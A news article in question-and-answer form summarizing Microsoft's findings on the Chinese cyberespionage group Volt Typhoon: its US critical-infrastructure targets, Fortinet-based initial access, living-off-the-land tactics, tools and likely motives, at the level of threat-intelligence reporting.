Chinese Cyberespionage Group ‘Volt Typhoon’ Targets Critical Infrastructure in the United States

Microsoft has identified a Chinese cyberespionage group known as Volt Typhoon, which has been conducting targeted attacks on critical infrastructure organizations across the United States, including Guam, since mid-2021.

The group’s activities span various sectors, such as government, maritime, communications, manufacturing, information technology, utilities, transportation, construction, and education.

Microsoft’s Threat Intelligence team believes that Volt Typhoon aims to develop capabilities that could disrupt vital communications infrastructure between the United States and Asia during future crises.

Who is Volt Typhoon and what are their targets?

Volt Typhoon is a Chinese cyberespionage group identified by Microsoft. They have been targeting critical infrastructure organizations in the United States, including Guam, since mid-2021.

Their targets encompass sectors like government, maritime, communications, manufacturing, information technology, utilities, transportation, construction, and education.

What is the objective of the Volt Typhoon campaign?

The Volt Typhoon campaign, according to Microsoft’s assessment, aims to develop capabilities that could disrupt critical communications infrastructure between the United States and the Asia region during future crises.

How does Volt Typhoon gain access to targeted networks?

Volt Typhoon initially compromises Internet-exposed Fortinet FortiGuard devices by exploiting an undisclosed zero-day vulnerability.

Once inside the networks, they employ “living-off-the-land” tactics, utilizing hands-on-keyboard activity and living-off-the-land binaries (LOLBins), such as PowerShell, Certutil, Netsh, and the Windows Management Instrumentation Command-line (WMIC).

Which tools does Volt Typhoon employ in their attacks?

In addition to their own tools, Volt Typhoon has been observed using open-source tools like Fast Reverse Proxy (frp), the Mimikatz credential-stealing tool, and the Impacket networking framework.

These details were included in a joint advisory released by the FBI, NSA, CISA, and cybersecurity agencies from Australia, New Zealand, the United Kingdom, and Canada.

How does Volt Typhoon evade detection?

To evade detection, Volt Typhoon utilizes compromised small office and home office (SOHO) network equipment from various manufacturers, including ASUS, Cisco, D-Link, Netgear, FatPipe, and Zyxel. This equipment, such as routers, firewalls, and VPN appliances, enables hackers to blend their malicious activity with legitimate network traffic.

What privileges do the hackers obtain after compromising Fortinet devices?

Gaining privileged access after compromising Fortinet devices, the hackers extract credentials through the Local Security Authority Subsystem Service (LSASS), which they then leverage to deploy Awen-based web shells.

These web shells facilitate data exfiltration and persistence on compromised systems.

What is the potential motive behind Volt Typhoon’s attacks on US critical infrastructure?

According to Mandiant Intelligence Chief Analyst John Hultquist, these intrusions into US critical infrastructure organizations are likely part of a concerted effort to grant China access in the event of a future conflict between the two countries.

Hultquist suggests that targeting critical infrastructure is a common practice among states as they prepare for possible conflicts.

Is an imminent cyberattack expected from Volt Typhoon?

While the operations conducted by Volt Typhoon are aggressive and potentially dangerous, they do not necessarily indicate an immediate attack.

Similar long-term intrusions into critical infrastructure have been observed in the past by countries like Russia, targeting sectors such as oil and gas. However, these activities serve as preparations rather than indications of imminent attacks.

Microsoft has proactively reached out to the targeted or compromised customers to provide them with the necessary.